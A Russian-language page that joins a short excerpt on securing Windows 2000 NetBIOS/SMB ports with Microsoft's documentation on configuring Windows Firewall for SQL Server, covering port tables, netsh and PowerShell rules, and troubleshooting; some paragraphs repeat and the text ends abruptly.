- Как отмечалось в главе 3, служба сеансов NetBIOS Session Service, работающая через порт TCP 139, является одним из источников утечки информации и потенциального взлома сети под управлением Windows NT. Большинство действий, описанных в главе 5, выполняется исключительно через соединения по протоколу NetBIOS. Данные операционной системы Windows 2000 могут также быть получены через порт TCP 445.
Большинство действий, описанных в главе 5, выполняется исключительно через соединения по протоколу NetBIOS. Данные операционной системы Windows 2000 могут также быть получены через порт TCP 445.He забудьте прочитать раздел » Отключение служб NetBIOS/SMB в Windows 2000″ ниже в этой главе.
Имеет смысл также защитить порты, находящиеся в состоянии ожидания запросов, отдельных компьютеров. Такая «защита в глубину» значительно затрудняет возможность сетевых атак. Классический совет в этой связи сводится к завершению работы всех ненужных служб с помощью программы services.msc и их отключению. Особое внимание следует уделить котроллерам доменов под управлением Windows 2000: когда контроллеру домена делегируются права сервера (Server) или расширенного сервера (Advanced Server) с помощью команды dcpromo.exe, на нем автоматически устанавливаются служба активного каталога, DNS и сервер DHCP, а также открываются соответствующие порты.
Контроллеры доменов – это важнейшие компоненты сети, поэтому они требуют особого обращения. Большинство приложений, файловые службы и службы печати лучше устанавливать на других компьютерах. Стремление к минимуму – первый принцип безопасности.
Чтобы ограничить доступ к портам отдельных компьютеров, можно использовать проверенные временем фильтры для протокола TCP/IP. Доступ к этим параметрам можно получить через вкладку Options диалогового окна, открываемого с помощью команды Network and Dial-up Connections › Properties › lnternet Protocol (TCP/IP) Properties › Advanced. Однако здесь сохранились старые недостатки. Фильтры протокола TCP/IP применяются сразу ко всем адаптерам. Их установка приведет к невозможности загрузки данных, инициированной даже легитимными соединениями, и сделает невозможным обычный просмотр Web-страниц в браузере системы. Кроме того, для корректного вступления в силу внесенных изменений требуется перегрузить систему.
Проведенное авторами тестирование Windows 2000 показало, что установка фильтров TCP/IP не блокирует эхо-пакетов ICMP (протокол 1), даже если отключить все протоколы IP, кроме 6 (TCP) и 17 (UDP).
sql-docs.ru-ru/configure-the-windows-firewall-to-allow-sql-server-access.md at live · MicrosoftDocs/sql-docs.ru-ru · GitHub
| title | description | ms.custom | ms.date | ms.prod | ms.reviewer | ms.technology | ms.topic | helpviewer_keywords | ms.assetid | author | ms.author | ms.openlocfilehash | ms.sourcegitcommit | ms.translationtype | ms.contentlocale | ms.lasthandoff | ms.locfileid | ||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Настройка брандмауэра Windows | Узнайте, как настроить брандмауэр Windows, чтобы разрешить доступ к экземпляру SQL Server через брандмауэр. | contperf-fy21q3 | 04/07/2021 | sql | install | conceptual |
| f55c6a0e-b6bd-4803-b51a-f3a419803024 | cawrites | chadam | ca3e3ae4255fc1815e690ef633350b33e4725ed9 | 09122d02fc3d86c6028366653337c083da8a3f4c | HT | ru-RU | 04/08/2021 | 107072436 |
[!INCLUDE SQL Server Windows Only — ASDBMI ]
Системы брандмауэров предотвращают несанкционированный доступ к ресурсам компьютера.
Если брандмауэр включен, но настроен неправильно, попытка соединения с [!INCLUDEssNoVersion] может оказаться заблокированной.
Чтобы разрешить доступ к экземпляру [!INCLUDEssNoVersion] через брандмауэр, его необходимо настроить на компьютере, на котором работает [!INCLUDEssNoVersion]. Брандмауэр является компонентом [!INCLUDEmsCoName] Windows. Вместо него можно установить брандмауэр другой компании. В этой статье обсуждается настройка брандмауэра Windows, однако общие принципы применимы к любым другим брандмауэрам.
[!NOTE]
В статье содержатся общие сведения о настройке брандмауэра и сводные сведения, представляющие интерес для администратора [!INCLUDEssNoVersion]. Дополнительные сведения и официальные данные о брандмауэрах см. в документации по брандмауэру, например в разделе Руководство по безопасности для развертывания брандмауэра Windows.
Пользователи, знакомые с управлением брандмауэром Windows и знающие, какие параметры брандмауэра они хотят настроить, могут перейти напрямую к более сложным статьям:
Основные сведения о брандмауэрах
Брандмауэр проверяет входящие пакеты на соответствие следующему набору правил:
- Если пакет соответствует стандартам, заданным правилами, то брандмауэр передает его протоколу TCP/IP для дальнейшей обработки.
- Пакет не соответствует стандартам, заданным в правилах.
- В этом случае брандмауэр отклоняет пакет. Если включено ведение журнала, в файле журнала брандмауэра создается соответствующая запись.
Список разрешенного трафика заполняется одним из следующих способов.
Автоматически. Когда защищенный брандмауэром компьютер инициирует соединение, брандмауэр добавляет в список запись, чтобы разрешить ответ. Ответ считается запрашиваемым трафиком, и ничего настраивать не требуется.
Вручную. Работа администратора заключается в настройке исключений в работе брандмауэра. Это открывает доступ к определенным программам или портам на вашем компьютере. В этом случае компьютер принимает весь входящий трафик, выполняя роль сервера, прослушивателя или однорангового узла. Настройку необходимо выполнить для подключения к [!INCLUDEssNoVersion].
Выбор стратегии брандмауэра является более сложной задачей и не сводится лишь к открытию или закрытию портов.
При выборе стратегии брандмауэра для предприятия необходимо обязательно рассмотреть все доступные правила и параметры конфигурации. В этой статье не рассматриваются все возможные параметры брандмауэра. Рекомендуем ознакомиться со следующими документами:
Руководство по развертыванию брандмауэра Windows
Руководство по проектированию для брандмауэра Windows
Основные сведения об изоляции серверов и доменов
Параметры брандмауэра по умолчанию
Первым шагом при планировании конфигурации брандмауэра является определение его текущего состояния в операционной системе. Если операционная система была обновлена с предыдущей версии, в ней могли сохраниться старые настройки брандмауэра. Изменять параметры брандмауэра в домене может групповая политика или администратор.
[!NOTE]
Включение брандмауэра может повлиять на общий доступ к файлам и принтерам, подключения к удаленному рабочему столу и работу других программ, которым необходим доступ к компьютеру.
Администратор должен просмотреть все приложения, которые работают на компьютере, прежде чем приступать к настройке параметров брандмауэра.Программы для настройки брандмауэра
Настройте параметры брандмауэра Windows с помощью консоли управления (MMC) или netsh.
Консоль управления (MMC)
Оснастка «Брандмауэр Windows в режиме повышенной безопасности» позволяет настраивать дополнительные параметры брандмауэра. Эта оснастка представляет большинство параметров брандмауэра и в удобной форме, а также все профили брандмауэра. Дополнительные сведения см. в разделе Использование оснастки «Брандмауэр Windows в режиме повышенной безопасности» далее в этой статье.
netsh
Средство netsh.exe позволяет администратору настраивать и отслеживать компьютеры с Windows из командной строки или с помощью пакетного файла . При использовании средства netsh вводимые контекстные команды направляются соответствующим вспомогательным приложениям, которые их выполняют.
Вспомогательное приложение — это файл библиотеки динамической компоновки (DLL) для расширения функциональных возможностей. Вспомогательное приложение обеспечивает настройку, мониторинг и поддержку различных служб, служебных программ и протоколов для средства netsh.Все операционные системы, поддерживающие [!INCLUDEssNoVersion] , имеют модуль поддержки брандмауэра. [!INCLUDEfirstref_longhorn] также содержит расширенный помощник брандмауэра advfirewall. Многие из описанных параметров конфигурации можно настроить с помощью средства netsh. Например, выполните в командной строке следующий скрипт, чтобы открыть TCP-порт 1433:
netsh firewall set portopening protocol = TCP port = 1433 name = SQLPort mode = ENABLE scope = SUBNET profile = CURRENTАналогичный пример, использующий брандмауэр Windows для модуля поддержки повышенной безопасности:
netsh advfirewall firewall add rule name = SQLPort dir = in protocol = tcp action = allow localport = 1433 remoteip = localsubnet profile = DOMAINДополнительные сведения о средстве netsh см.
в следующих разделах:PowerShell
В следующем примере показано, как открыть TCP-порт 1433 и UDP-порт 1434 для экземпляра по умолчанию SQL Server и службы обозревателя SQL Server:
New-NetFirewallRule -DisplayName "SQLServer default instance" -Direction Inbound -LocalPort 1433 -Protocol TCP -Action Allow New-NetFirewallRule -DisplayName "SQLServer Browser service" -Direction Inbound -LocalPort 1434 -Protocol UDP -Action Allow
Дополнительные примеры см. в разделе New-NetFirewallRule.
Для Linux. В Linux необходимо также открыть порты, связанные со службами, к которым вам нужен доступ. Различные дистрибутивы Linux и брандмауэры имеют свои процедуры. Примеры см. в руководствах по использованию SQL Server в Red Hat и SUSE.
Вспомогательное приложение — это файл библиотеки динамической компоновки (DLL) для расширения функциональных возможностей. Вспомогательное приложение обеспечивает настройку, мониторинг и поддержку различных служб, служебных программ и протоколов для средства netsh.
в следующих разделах:Порты, используемые [!INCLUDEssNoVersion]
Следующие таблицы помогут выяснить, какие порты использует [!INCLUDEssNoVersion].
Ports Used By the Database Engine
По умолчанию приведены типичные порты, используемые службами SQL Server и связанными службами ядра СУБД.
TCP 1433, 4022, 135, 1434, UDP 1434. В таблице ниже эти порты описаны подробно. Именованный экземпляр использует динамические порты.
В следующей таблице перечислены порты, обычно используемые компонентом [!INCLUDEssDE].
| Сценарий | Порт | Комментарии |
|---|---|---|
| Экземпляр по умолчанию, работающий по протоколу TCP | TCP-порт 1433 | Этот порт открывают в брандмауэре чаще всего. Он применяется для программных соединений с экземпляром компонента [!INCLUDEssDE]по умолчанию или именованным экземпляром, который является единственным на данном компьютере (для именованных экземпляров следует учитывать ряд особых требований, подробнее о которых см. в разделе Динамические порты далее в этой статье). |
| Именованные экземпляры с портом по умолчанию | TCP-порт выделяется динамически в момент запуска компонента [!INCLUDEssDE] . | См. подраздел Динамические портыдалее в этом разделе. При использовании именованных экземпляров службе обозревателя [!INCLUDEssNoVersion] может потребоваться UDP-порт 1434. |
| Именованные экземпляры с фиксированным портом | Номер порта настраивается администратором. | См. подраздел Динамические портыдалее в этом разделе. |
| Выделенное административное соединение | TCP-порт 1434 предназначен для экземпляра по умолчанию. Другие порты используются для именованных экземпляров. Номер порта проверьте по журналу ошибок. | По умолчанию удаленные подключения по выделенному административному соединению (DAC) не активированы. Разрешить удаленное выделенное административное соединение можно при помощи средства настройки контактной зоны. Дополнительные сведения см. в разделе Surface Area Configuration. |
| [!INCLUDEssNoVersion] Служба браузера | UDP-порт 1434 | Служба обозревателя [!INCLUDEssNoVersion] ожидает передачи данных с входящих подключений к именованному экземпляру. |
| Служба предоставляет клиенту номер TCP-порта, соответствующий этому именованному экземпляру. Обычно служба « [!INCLUDEssNoVersion] , браузер» запускается при использовании именованного экземпляра компонента [!INCLUDEssDE] . Если клиент настроен на подключение к конкретному порту именованного экземпляра, служба обозревателя [!INCLUDEssNoVersion] не требуется. | ||
| Экземпляр с конечной точкой HTTP. | Может указываться во время создания конечной точки HTTP. По умолчанию используется TCP-порт 80 для данных CLEAR_PORT и порт 443 для данных SSL_PORT. | Используется для HTTP-соединения по URL-адресу. |
| Экземпляр по умолчанию с конечной точкой HTTPS. | TCP-порт 443 | Используется для HTTPS-соединения по URL-адресу. HTTPS — это HTTP-соединение, которое использует протокол TLS, ранее называемый SSL. |
| [!INCLUDEssSB] | TCP-порт 4022. Чтобы проверить используемый порт, выполните следующий запрос:
| Для компонента [!INCLUDEssNoVersion][!INCLUDEssSB] порт по умолчанию отсутствует. В примерах электронной документации используется стандартная конфигурация. |
| Зеркальное отображение базы данных | Порт, выбранный администратором. Чтобы определить порт, выполните следующий запрос.
| Для зеркального отображения базы данных порт по умолчанию отсутствует, однако в примерах электронной документации используется TCP-порт 5022 или 7022. Важно избегать прерывания работы используемой конечной точки зеркального отображения, особенно в режиме высокого уровня безопасности с автоматической отработкой отказа. Конфигурация брандмауэра должна избегать прерывания кворума. Дополнительные сведения см. в разделе Указание сетевого адреса сервера (зеркальное отображение базы данных). |
| Репликация | Соединения репликации с [!INCLUDEssNoVersion] используют порты, которые обычно использует компонент [!INCLUDEssDE] (TCP-порт 1433 для экземпляра по умолчанию). Веб-синхронизация и доступ через FTP/UNC для моментального снимка репликации требуют открытия в брандмауэре дополнительных портов. Передачу начальных данных и схемы из одного места в другое репликация осуществляет по протоколу FTP (TCP-порт 21) либо с помощью синхронизации через HTTP (TCP-порт 80) или общего доступа к файлам. Для общего доступа к файлам применяются UDP-порты 137 и 138, а также TCP-порт 139 при использовании совместно с NetBIOS. Совместное использование файлов использует TCP-порт 445. | Для синхронизации по протоколу HTTP в репликации используется конечная точка служб IIS (настраиваемая, по умолчанию — порт 80), однако процесс IIS подключается к внутреннему интерфейсу [!INCLUDEssNoVersion] через стандартные порты (1433 для экземпляра по умолчанию). При веб-синхронизации через FTP-порт передача данных выполняется между службами IIS и издателем [!INCLUDEssNoVersion] , а не между подписчиком и службами IIS. |
| [!INCLUDEtsql] отладчик | TCP-порт 135 См. раздел Особые замечания относительно порта 135 Также может потребоваться исключение IPsec . | При использовании среды [!INCLUDEvsprvs]на [!INCLUDEvsprvs] главном компьютере в список исключений необходимо также добавить программу Devenv.exe и открыть TCP-порт 135. При использовании среды [!INCLUDEssManStudio]на [!INCLUDEssManStudio] главном компьютере необходимо также добавить в список исключений программу ssms.exe и открыть TCP-порт 135. Дополнительные сведения см. в разделе Настройка правил брандмауэра перед запуском отладчика TSQL. |
tcp_endpoints
Пошаговые инструкции по настройке брандмауэра Windows для [!INCLUDEssDE] см. в разделе Настройка брандмауэра Windows для доступа к компоненту Database Engine.
Динамические порты
По умолчанию именованные экземпляры (включая [!INCLUDEssExpress]) используют динамические порты. Это означает, что при каждом запуске компонент [!INCLUDEssDE] находит доступный порт и использует его номер.
Если именованный экземпляр является единственным установленным экземпляром компонента [!INCLUDEssDE] , то, скорее всего, он будет использовать TCP-порт 1433. При установке других экземпляров компонента [!INCLUDEssDE] они будут использовать другие TCP-порты. Поскольку выбираемый порт при каждом запуске компонента [!INCLUDEssDE] может меняться, трудно настроить брандмауэр на разрешение доступа к нужному порту. Если используется брандмауэр, рекомендуем перенастроить компонент [!INCLUDEssDE] на постоянное использование одного и того же порта. Рекомендуется использовать фиксированный или статический порт. Дополнительные сведения см. в разделе Настройка сервера для прослушивания указанного TCP-порта (диспетчер конфигурации SQL Server).
В качестве альтернативы настройке именованного экземпляра для прослушивания фиксированного порта можно создать в брандмауэре исключение для программы [!INCLUDEssNoVersion], например sqlservr.exe (для компонента [!INCLUDEssDE]). Номер порта не будет отображаться в столбце Локальный порт на странице Правила для входящего трафика при использовании оснастки MMC «Брандмауэр Windows в режиме повышенной безопасности».
Аудит открытых портов может быть сложной задачей. Также нужно учитывать, что простой или накопительный пакет обновления может изменить путь к исполняемому файлу [!INCLUDEssNoVersion], что сделает правило брандмауэра недействительным.
Добавление в брандмауэр исключения для программы при помощи элемента «Брандмауэр Защитника Windows в режиме повышенной безопасности»
В меню «Пуск» наберите wf.msc. Нажмите клавишу ВВОД или выберите результат поиска «wf.msc», чтобы открыть Брандмауэр Защитника Windows в режиме повышенной безопасности.
В левой панели щелкните Правила для входящих подключений.
В правой панели в разделе Действия нажмите кнопку Создать правило… . Откроется мастер создания правила для нового входящего подключения.
В разделе Тип правила выберите Программа. Выберите Далее.
В разделе Программа выберите Путь к программе. Нажмите кнопку Обзор и найдите файл программы SQL Server. Этот файл называется sqlservr.exe. Обычно он находится здесь:
C:\Program Files\Microsoft SQL Server\MSSQL15.<InstanceName>\MSSQL\Binn\sqlservr.exeВыберите Далее.
В разделе Действие выберите вариант Разрешить подключение. Выберите Далее.
В разделе Профиль включите все три профиля. Выберите Далее.
В поле Имя введите имя правила. Нажмите кнопку Готово.
Дополнительные сведения о конечных точках см. в разделах Настройка ядра СУБД на прослушивание нескольких портов TCP и Представления каталога конечных точек (Transact-SQL).
Порты, используемые службами Analysis Services
По умолчанию типичные порты, используемые SQL Server Analysis Services и связанными службами, — это: TCP 2382, 2383, 80, 443.
В таблице ниже эти порты описаны подробно.
В следующей таблице перечислены порты, обычно используемые службами [!INCLUDEssASnoversion].
| Компонент | Порт | Комментарии |
|---|---|---|
| [!INCLUDEssASnoversion] | TCP-порт 2383 для экземпляра по умолчанию | Стандартный порт для экземпляра служб [!INCLUDEssASnoversion]по умолчанию. |
| [!INCLUDEssNoVersion] Служба браузера | Для именованного экземпляра служб [!INCLUDEssASnoversion] необходим только TCP-порт 2382 | Запросы клиентов на подключение к именованному экземпляру [!INCLUDEssASnoversion], в которых не указан номер порта, направляются на порт 2382, на котором ожидает передачи данных служба обозревателя [!INCLUDEssNoVersion]. [!INCLUDEssNoVersion] затем перенаправляет запрос на порт, используемый запрошенным именованным экземпляром. |
| [!INCLUDEssASnoversion] настроены для работы через протокол IIS/HTTP (служба PivotTable® Service использует протокол HTTP или HTTPS) | TCP-порт 80 | Используется для HTTP-соединения по URL-адресу. |
| [!INCLUDEssASnoversion] настроены для работы через протокол IIS/HTTPS (служба PivotTable® Service использует протокол HTTP или HTTPS) | TCP-порт 443 | Используется для HTTPS-соединения по URL-адресу. HTTPS представляет собой HTTP-соединение, защищенное по протоколу TSL. |
Если пользователи обращаются к [!INCLUDEssASnoversion] через IIS и Интернет, необходимо открыть порт, где IIS ожидает передачи данных. Затем нужно указать порт в строке подключения клиента. В этом случае необязательно иметь открытые порты для прямого доступа к службам [!INCLUDEssASnoversion]. Необходимо ограничить доступ к порту по умолчанию 2389, порту 2382 и другим портам, доступ к которым не требуется.
Пошаговые инструкции по настройке брандмауэра Windows для [!INCLUDEssASnoversion] см. в разделе Настройка брандмауэра Windows на разрешение доступа к службам Analysis Services.
Порты, используемые службами Reporting Services
По умолчанию SQL Server Reporting Services и связанные службы обычно используют порты TCP 80 и 443.
В таблице ниже эти порты описаны подробно.
В следующей таблице перечислены порты, обычно используемые службами [!INCLUDEssRSnoversion].
| Компонент | Порт | Комментарии |
|---|---|---|
| [!INCLUDEssRSnoversion] Веб-службы | TCP-порт 80 | Используется для HTTP-соединения со службами [!INCLUDEssRSnoversion] по URL-адресу. Не рекомендуется использовать предварительно настроенное правило Службы Интернета (HTTP) . Дополнительные сведения см. в разделе Взаимодействие с другими правилами брандмауэра ниже. |
| [!INCLUDEssRSnoversion] настроены для работы через протокол HTTPS | TCP-порт 443 | Используется для HTTPS-соединения по URL-адресу. HTTPS представляет собой HTTP-соединение, защищенное по протоколу TSL. Не рекомендуется использовать предварительно настроенное правило Защищенные службы Интернета (HTTP) . Дополнительные сведения см. в разделе Взаимодействие с другими правилами брандмауэра ниже. |
Для соединения служб [!INCLUDEssRSnoversion] с экземпляром компонента [!INCLUDEssDE] или служб [!INCLUDEssASnoversion]необходимо также открыть соответствующие порты для этих служб. Пошаговые инструкции по настройке брандмауэра Windows для компонента [!INCLUDEssRSnoversion]см. в разделе Настройка брандмауэра для доступа к серверу отчетов.
Порты, используемые службами Integration Services
В следующей таблице перечислены порты, используемые службой [!INCLUDEssISnoversion] .
| Компонент | Порт | Комментарии |
|---|---|---|
| [!INCLUDEmsCoName] удаленные вызовы процедур (MS RPC) Используется средой выполнения служб [!INCLUDEssISnoversion] . | TCP-порт 135 См. раздел Особые замечания относительно порта 135 | Служба [!INCLUDEssISnoversion] обращается к DCOM по порту 135. Диспетчер служб использует порт 135 для запуска и остановки службы [!INCLUDEssISnoversion], передачи работающей службе запросов управления и для других задач. Номер порта не может быть изменен.Этот порт должен быть открыт только при подключении к удаленному экземпляру службы [!INCLUDEssISnoversion] из среды [!INCLUDEssManStudio] или пользовательского приложения. |
Пошаговые инструкции по настройке брандмауэра Windows для служб [!INCLUDEssISnoversion] см. в статье Службы Integration Services (службы SSIS).
Другие порты и службы
В следующей таблице перечислены порты и службы, от которых может зависеть [!INCLUDEssNoVersion] .
| Сценарий | Порт | Комментарии |
|---|---|---|
| Инструментарий управления Windows (WMI) Дополнительные сведения об инструментарии управления Windows (WMI) см. в разделе основных принципов поставщика WMI для управления конфигурацией. | Инструментарий WMI запускается в составе общего узла службы с назначением портов через DCOM. Инструментарий WMI может пользовать TCP-порт 135. См. раздел Особые замечания относительно порта 135 | [!INCLUDEssNoVersion] использует инструментарий WMI для просмотра и управления службами. Рекомендуется использовать стандартную группу правил Инструментарий управления Windows (WMI) . Дополнительные сведения см. в разделе Взаимодействие с другими правилами брандмауэра ниже. |
| [!INCLUDEmsCoName] Координатор распределенных транзакций (Майкрософт) (MS DTC) | TCP-порт 135 См. раздел Особые замечания относительно порта 135 | Если приложение использует распределенные транзакции, то может потребоваться настройка брандмауэра таким образом, чтобы разрешить передачу данных координатора распределенных транзакций ([!INCLUDEmsCoName]) (MS DTC) между отдельными экземплярами MS DTC и между MS DTC и диспетчерами ресурсов (например, [!INCLUDEssNoVersion]). Рекомендуется использовать стандартную группу правил Координатор распределенных транзакций . Если для всего кластера настроен единственный общий координатор MS DTC в отдельной группе ресурсов, следует добавить программу sqlservr.exe в список исключений брандмауэра. |
Кнопка обзора в среде [!INCLUDEssManStudio] соединяется со службой [!INCLUDEssNoVersion], браузер по протоколу UDP. Дополнительные сведения см. в разделе Служба обозревателя SQL Server (ядро СУБД и SSAS). | UDP-порт 1434 | Протокол UDP не сохраняет соединения. Свойство UnicastResponsesToMulticastBroadcastDisabled интерфейса INetFwProfile управляет работой брандмауэра и одноадресными ответами на широковещательные (или многоадресные) UDP-запросы. Возможны два варианта. Если этот параметр имеет значение TRUE, то одноадресные ответы на широковещательные запросы запрещены. Перечисление служб завершится ошибкой. Если этот параметр имеет значение FALSE (по умолчанию), то одноадресные ответы разрешены в течение 3 секунд. Эта длительность не настраивается. Если сеть переполнена, каналы имеют задержки или сервер работает в режиме высокой нагрузки, то при построении списка экземпляров [!INCLUDEssNoVersion] список может быть возвращен лишь частично и ввести пользователя в заблуждение. |
| Трафик по протоколу IPsec | UDP-порты 500 и 4500 | Если политика домена требует выполнения сетевых соединения через протокол IPsec, необходимо добавить в список исключений UDP-порты 4500 и 500. Протокол IPsec можно включить с помощью мастера создания правила для входящего подключения в оснастке «Брандмауэр Windows». Дополнительные сведения см. в разделе Использование оснастки «Брандмауэр Windows в режиме повышенной безопасности» ниже. |
| Использование проверки подлинности Windows в надежных доменах | Брандмауэр можно настроить для разрешения запросов проверки подлинности. | Дополнительные сведения см. в разделе Настройка брандмауэра для работы с доменами и отношениями доверия. |
| [!INCLUDEssNoVersion] и кластеризация Windows | Для кластеризации требуется открыть дополнительные порты, не связанные с [!INCLUDEssNoVersion] напрямую. | Дополнительные сведения см. в разделе Подготовка сети для работы кластера. |
| Пространства имен URL-адресов, зарезервированные в компоненте HTTP.SYS | Обычно TCP-порт 80, однако можно настроить для использования любого другого порта. Общие сведения см. в разделе Настройка протоколов HTTP и HTTPS. | Сведения о резервировании конечной точки компонента HTTP.SYS с помощью программы HttpCfg.exe, относящиеся к [!INCLUDEssNoVersion], см. в разделе Сведения о резервировании и регистрации URL-адресов (диспетчер конфигурации служб SSRS). |
Особые замечания относительно порта 135
При использовании RPC с транспортным протоколом TCP/IP или UDP/IP входящие порты динамически назначаются системным службам по мере надобности. Используются порты TCP/IP и UDP/IP с номерами выше 1024. Эти порты называются «случайными RPC-портами». В этом случае RPC-клиент определяет порт, назначенный серверу, через модуль конечной точки RPC. Для некоторых служб, работающих через протокол RPC, можно настроить использование определенного фиксированного порта. Можно также ограничить диапазон портов, динамически назначаемых RPC и не зависящих от службы. Поскольку порт 135 используется для многих служб, он часто подвергается атакам злоумышленников. В случае открытия порта 135 рекомендуется ограничить область действия правила брандмауэра.
Дополнительные сведения о порте 135 см. в следующих ресурсах.
Взаимодействие с другими правилами брандмауэра
Настройка брандмауэра Windows производится на основе правил и групп правил. Каждое правило или группа правил связывается с определенной программой или службой, которая может изменять или удалять это правило без вашего ведома. Например, группы правил Службы Интернета (HTTP) и Защищенные службы Интернета (HTTPS) связаны со службами IIS. При включении этих правил будут открыты порты 80 и 443 и разрешены функции [!INCLUDEssNoVersion] , зависящие от этих портов. Однако администратор в процессе настройки служб IIS может изменить или отключить эти правила. Если вы используете для [!INCLUDEssNoVersion] порт 80 или 443, создайте собственное правило или группу правил для поддержки необходимой конфигурации портов независимо от других правил IIS.
Оснастка «Брандмауэр Windows в режиме повышенной безопасности» пропускает весь трафик, соответствующий применимым разрешающим правилам.
Таким образом, если существуют два правила для порта 80 (с разными параметрами), то будет пропускаться трафик, соответствующий любому из них. Например, если одно правило разрешает трафик по порту 80 из локальной подсети, а другое разрешает трафик с любого адреса, то в итоге на порту 80 будет разрешен любой трафик независимо от источника. Чтобы обеспечить эффективное управление доступом к [!INCLUDEssNoVersion], администратор должен периодически проверять все правила брандмауэра, разрешенные на сервере.
Общие сведения о профилях брандмауэра
В соответствии с профилями брандмауэра операционная система определяет и запоминает каждую из сетей по следующим параметрам: возможность подключения, имеющиеся подключения и категория.
Брандмауэр Windows в режиме повышенной безопасности делит сети на три типа.
- Домен. Windows может выполнить проверку подлинности доступа к контроллеру домена, в который включен компьютер.
- Общедоступные. В эту категорию первоначально попадают все сети, не входящие в домены. Сети, которые представляют прямые соединения с Интернетом, являются открытыми (аэропорты, кафе и другие места открытого доступа).
- Частные. Сеть, определенная пользователем или приложением как личная. Только доверенные сети могут быть определены как частные. Обычно в качестве частной сети определяется сеть малого предприятия, домашняя сеть и т. п.
В эту категорию первоначально попадают все сети, не входящие в домены. Сети, которые представляют прямые соединения с Интернетом, являются открытыми (аэропорты, кафе и другие места открытого доступа).Администратор может создать профиль для каждого типа сети и задать для этих профилей разные политики брандмауэра. Одномоментно применим только один профиль. Профили применяются в следующем порядке.
- Профиль домена применяется, когда все интерфейсы проходят проверку подлинности на контроллере домена, членом которого является компьютер.
- Если все интерфейсы либо прошли проверку подлинности к контроллеру домена, либо соединены с сетями, которые определены как частные, применяется частный профиль.
- В противном случае применяется открытый профиль.
Просмотреть и настроить профили брандмауэра можно с помощью оснастки «Брандмауэр Windows в режиме повышенной безопасности». Элемент Брандмауэр Windows на панели управления позволяет настраивать только текущий профиль.
Дополнительные параметры брандмауэра в элементе «Брандмауэр Windows» на панели управления
Добавление брандмауэра позволяет блокировать открытие порта для входящих подключений с определенных компьютеров или из локальной подсети. Ограничьте область открытия портов, чтобы сделать компьютер менее уязвимым для злоумышленников.
[!NOTE]
Элемент Брандмауэр Windows на панели управления позволяет настроить только текущий профиль.
Изменение области действия исключения брандмауэра с помощью «Брандмауэра Windows» на панели управления
В панели управления в элементе Брандмауэр Windows выберите на вкладке Исключения программу или порт, а затем нажмите Свойства или Изменить.
В диалоговом окне Изменение программы или Изменение порта нажмите Изменить область.
Выберите один из следующих вариантов.
Любой компьютер (включая компьютеры в Интернете) : не рекомендуется. В этом случае любой компьютер, способный обращаться к вашему, сможет подключаться к указанной программе или порту. Этот параметр может пригодиться для передачи данных анонимным пользователям Интернета, однако он повышает уязвимость компьютера. Уязвимость повысится, если одновременно с этим параметром разрешить обход с использованием преобразования сетевых адресов (NAT), например с помощью параметра «Разрешить обход узлов».
Только моя сеть (подсеть) : это более безопасный вариант по сравнению с режимом Любой компьютер. Только компьютеры локальной подсети могут производить соединение с программой или портом.
Особый список.
Соединение разрешено только компьютерам, имеющим перечисленные здесь IP-адреса. Этот режим может быть более безопасным по сравнению с вариантом Только моя сеть (подсеть) , однако клиентские компьютеры, использующие протокол DHCP, могут иногда менять IP-адреса, что приводит к невозможности подключения. При этом другой компьютер, которому не предоставлялся доступ, может принять указанный в списке IP-адрес и подключиться к нему. Вариант Настраиваемый список подходит для получения списков других серверов, для которых настроены фиксированные IP-адреса.
IP-адреса могут быть подделаны злоумышленником. Эффект ограничения правил брандмауэра напрямую зависит от уровня защиты сетевой инфраструктуры.
Соединение разрешено только компьютерам, имеющим перечисленные здесь IP-адреса. Этот режим может быть более безопасным по сравнению с вариантом Только моя сеть (подсеть) , однако клиентские компьютеры, использующие протокол DHCP, могут иногда менять IP-адреса, что приводит к невозможности подключения. При этом другой компьютер, которому не предоставлялся доступ, может принять указанный в списке IP-адрес и подключиться к нему. Вариант Настраиваемый список подходит для получения списков других серверов, для которых настроены фиксированные IP-адреса.
IP-адреса могут быть подделаны злоумышленником. Эффект ограничения правил брандмауэра напрямую зависит от уровня защиты сетевой инфраструктуры.Использование оснастки «Брандмауэр Windows в режиме повышенной безопасности»
Оснастка MMC «Брандмауэр Windows в режиме повышенной безопасности» позволяет настроить расширенные параметры брандмауэра. Эта оснастка включает мастер настройки правил и позволяет изменять параметры, недоступные в элементе Брандмауэр Windows из панели управления.
Эти параметры включают:
- Параметры шифрования.
- Ограничения служб.
- Ограничение соединений для компьютеров по именам.
- Ограничение соединений для определенных пользователей или профилей.
- Разрешение просмотра узлов для исключения маршрутизаторов NAT.
- Настройка правил исходящих соединений.
- Настройка правил безопасности.
- Требование протокола IPsec для входящих соединений.
Создание правила брандмауэра при помощи мастера создания правил
- В меню «Пуск» выберите пункт Выполнить, введите WF.msc и нажмите кнопку ОК.
- В левой части панели Брандмауэр Windows в режиме повышенной безопасности щелкните правой кнопкой мыши элемент Правила для входящих подключений и выберите пункт Создать правило.
- Завершите мастер создания правила для нового входящего подключения , задав все необходимые параметры.
Устранение неполадок настройки брандмауэра
Следующие средства и методы могут оказаться полезными при устранении неполадок брандмауэра.
Действующее состояние порта является объединением всех правил, связанных с этим портом. Чтобы заблокировать доступ к порту, бывает полезно просмотреть все правила, в которых он упоминается. Просмотрите правила с помощью оснастки MMC «Брандмауэр Windows в режиме повышенной безопасности» и отсортируйте правила для входящего и исходящего трафика по номеру порта.
Просмотрите порты, которые активны на компьютере, где запущен [!INCLUDEssNoVersion] . В процессе анализа необходимо проверить, на каких портах TCP/IP ожидается передача данных, а также проверить состояние этих портов.
Для определения, на каких портах ожидается передача данных, отобразите активные TCP-подключения и статистику IP-адресов, используя программу командной строки netstat.
Получение списка прослушиваемых TCP/IP-портов
Откройте окно командной строки.
В командной строке введите netstat -n -a.
При наличии параметра -n служебная программа netstat выводит адреса и номера портов активных подключений TCP в числовом виде. При наличии параметра -a служебная программа netstat выводит порты TCP и UDP, которые прослушиваются компьютером.
Служебную программу PortQry можно использовать для вывода состояния портов TCP/IP (прослушивается, не прослушивается, фильтруется). Если порт фильтруется, служебная программа может не получить от него ответ. Скачать PortQry можно в Центре загрузки Майкрософт.
См. также:
Общие сведения о службе и требования к сетевым портам в системе Windows Server
Руководство. Настройка параметров брандмауэра (база данных SQL Microsoft Azure)
Test-NetConnection: проверка открытых/закрытых TCP портов из PowerShell
В PowerShell 4.
